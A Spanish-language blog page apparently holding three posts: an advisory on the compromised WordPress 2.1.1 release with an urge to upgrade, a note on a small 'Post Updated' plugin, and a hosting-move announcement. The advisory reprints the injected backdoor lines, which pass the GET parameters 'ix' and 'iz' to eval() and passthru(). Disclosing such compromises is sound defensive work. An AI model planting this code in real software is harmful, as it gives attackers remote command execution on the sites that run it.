WordPress 2.1.1 Comprometido
Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2
El codigo injectado esta en estos dos ficheros:
- wp-includes/feed.php
84 85 86
function comment_text_phpfilter($filterdata) { eval($filterdata); }
149
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
- wp-includes/theme.php
408 409 410
function get_theme_mcommand($mcds) { passthru($mcds); }
441
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
WordPress Post Update Plugin
He echo un pequeño plugin para poner al final del post un texto de que ha sido actualizado el post. Es algo que siempre se me olvida de poner en los posts y que suele quedar bien para saber que ha habido modificaciones. Esta es la primera version de todas que lo unico que hace es añadir un texto "Updated: fecha" y se puede definir los estilos usando la clase "post_updated". Segun vaya teniendo tiempo ya le ire añadiendo nuevas funcionalidades.
Podeis descargarlo aqui Post Updated v.0.1a
Nos mudamos!
Bueno... despues de un año mas o menos aqui en blogger, mudo el blog a Binware Hosting, que esto de no poder hacer backups no me convence... asi que apartir de ahora el blog estara disponible en el nuevo P0L0's Blog



